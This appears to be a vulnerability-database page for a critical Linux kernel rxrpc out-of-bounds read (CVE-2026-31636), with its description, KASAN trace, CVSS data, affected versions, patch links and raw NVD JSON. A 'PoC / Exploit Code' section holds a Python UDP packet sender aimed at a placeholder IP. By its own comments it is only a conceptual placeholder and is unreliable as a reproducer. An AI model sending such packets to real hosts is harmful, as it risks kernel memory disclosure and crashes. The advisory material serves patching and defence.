CVE-2026-31636

Description

In the Linux kernel, the following vulnerability has been resolved: rxrpc: fix RESPONSE authenticator parser OOB read rxgk_verify_authenticator() copies auth_len bytes into a temporary buffer and then passes p + auth_len as the parser limit to rxgk_do_verify_authenticator(). Since p is a __be32 *, that inflates the parser end pointer by a factor of four and lets malformed RESPONSE authenticators read past the kmalloc() buffer. Decoded from the original latest-net reproduction logs with scripts/decode_stacktrace.sh: BUG: KASAN: slab-out-of-bounds in rxgk_verify_response() Call Trace: dump_stack_lvl() [lib/dump_stack.c:123] print_report() [mm/kasan/report.c:379 mm/kasan/report.c:482] kasan_report() [mm/kasan/report.c:597] rxgk_verify_response() [net/rxrpc/rxgk.c:1103 net/rxrpc/rxgk.c:1167 net/rxrpc/rxgk.c:1274] rxrpc_process_connection() [net/rxrpc/conn_event.c:266 net/rxrpc/conn_event.c:364 net/rxrpc/conn_event.c:386] process_one_work() [kernel/workqueue.c:3281] worker_thread() [kernel/workqueue.c:3353 kernel/workqueue.c:3440] kthread() [kernel/kthread.c:436] ret_from_fork() [arch/x86/kernel/process.c:164] Allocated by task 54: rxgk_verify_response() [include/linux/slab.h:954 net/rxrpc/rxgk.c:1155 net/rxrpc/rxgk.c:1274] rxrpc_process_connection() [net/rxrpc/conn_event.c:266 net/rxrpc/conn_event.c:364 net/rxrpc/conn_event.c:386] Convert the byte count to __be32 units before constructing the parser limit.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE

Linux Kernel < commit 20a188775a9a9982d1987e12660d9b44b40a6c99

Linux Kernel < commit 3e3138007887504ee9206d0bfb5acb062c600025

Linux Kernel < commit 7875f3d9777bd4e9892c4db830571ab8ac2044c0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

"""
CVE-2026-31636 PoC Concept
Target: Linux Kernel with vulnerable rxrpc module
Description: This script attempts to trigger the OOB read by sending a crafted
RXRPC packet with a specific authenticator length that exploits the pointer arithmetic bug.
Note: This requires a target environment listening for RXRPC connections.
"""

def send_exploit_packet(target_ip, target_port):
    # Create a UDP socket (RXRPC often runs over UDP)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    
    try:
        # Constructing a minimal RXRPC packet structure (Conceptual)
        # The vulnerability relies on the auth_len field in the authenticator.
        # We set auth_len such that p + auth_len (where p is __be32*) exceeds the buffer.
        
        header = b"\x00" * 20  # Simplified RXRPC header placeholder
        
        # Let's assume we want to trigger the bug with an auth_len that is valid in bytes
        # but causes OOB when multiplied by 4.
        # The bug is in rxgk_verify_authenticator -> rxgk_do_verify_authenticator limit check.
        
        # Malformed payload construction
        # The specific bytes to trigger the rxgk path would require a valid handshake context.
        # This payload represents the 'authenticator' data structure.
        auth_len = 20 # 20 bytes allocated
        
        # If the parser treats the limit as p + 20 (words), it expects 80 bytes.
        # If we send less than 80 bytes but the parser reads ahead, it crashes.
        
        payload = header
        payload += struct.pack("!I", auth_len) # Length field
        payload += b"A" * 16 # Some padding/data
        
        # Send packet
        sock.sendto(payload, (target_ip, target_port))
        print(f"[+] Exploit packet sent to {target_ip}:{target_port}")
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    # Replace with actual target IP and Port
    TARGET_IP = "192.168.1.100"
    TARGET_PORT = 7000
    send_exploit_packet(TARGET_IP, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31636
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31636
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31636/
[4] VulDB https://vuldb.com/cve/CVE-2026-31636
[5] https://git.kernel.org/stable/c/20a188775a9a9982d1987e12660d9b44b40a6c99
[6] https://git.kernel.org/stable/c/3e3138007887504ee9206d0bfb5acb062c600025
[7] https://git.kernel.org/stable/c/7875f3d9777bd4e9892c4db830571ab8ac2044c0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31636", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:42.920", "lastModified": "2026-04-27T20:21:04.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: fix RESPONSE authenticator parser OOB read\n\nrxgk_verify_authenticator() copies auth_len bytes into a temporary\nbuffer and then passes p + auth_len as the parser limit to\nrxgk_do_verify_authenticator(). Since p is a __be32 *, that inflates the\nparser end pointer by a factor of four and lets malformed RESPONSE\nauthenticators read past the kmalloc() buffer.\n\nDecoded from the original latest-net reproduction logs with\nscripts/decode_stacktrace.sh:\n\nBUG: KASAN: slab-out-of-bounds in rxgk_verify_response()\nCall Trace:\n dump_stack_lvl() [lib/dump_stack.c:123]\n print_report() [mm/kasan/report.c:379 mm/kasan/report.c:482]\n kasan_report() [mm/kasan/report.c:597]\n rxgk_verify_response()\n [net/rxrpc/rxgk.c:1103 net/rxrpc/rxgk.c:1167\n net/rxrpc/rxgk.c:1274]\n rxrpc_process_connection()\n [net/rxrpc/conn_event.c:266 net/rxrpc/conn_event.c:364\n net/rxrpc/conn_event.c:386]\n process_one_work() [kernel/workqueue.c:3281]\n worker_thread()\n [kernel/workqueue.c:3353 kernel/workqueue.c:3440]\n kthread() [kernel/kthread.c:436]\n ret_from_fork() [arch/x86/kernel/process.c:164]\n\nAllocated by task 54:\n rxgk_verify_response()\n [include/linux/slab.h:954 net/rxrpc/rxgk.c:1155\n net/rxrpc/rxgk.c:1274]\n rxrpc_process_connection()\n [net/rxrpc/conn_event.c:266 net/rxrpc/conn_event.c:364\n net/rxrpc/conn_event.c:386]\n\nConvert the byte count to __be32 units before constructing the parser\nlimit."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.16.1", "versionEndExcluding": "6.18.23", "matchCriteriaId": "EAE31F43-AAC5-4801-B2B2-119D62A532A2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.13", "matchCriteriaId": "1490EF9B-9080-481C-8D22-1306AAE664E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.16:-:*:*:*:*:*:*", "matchCriteriaId": "6238B17D-C12B-458F-A138-97039BFC4595"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/20a188775a9a9982d1987e12660d9b44b40a6c99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3e3138007887504ee9206d0bfb5acb062c600025", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7875f3d9777bd4e9892c4db830571ab8ac2044c0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}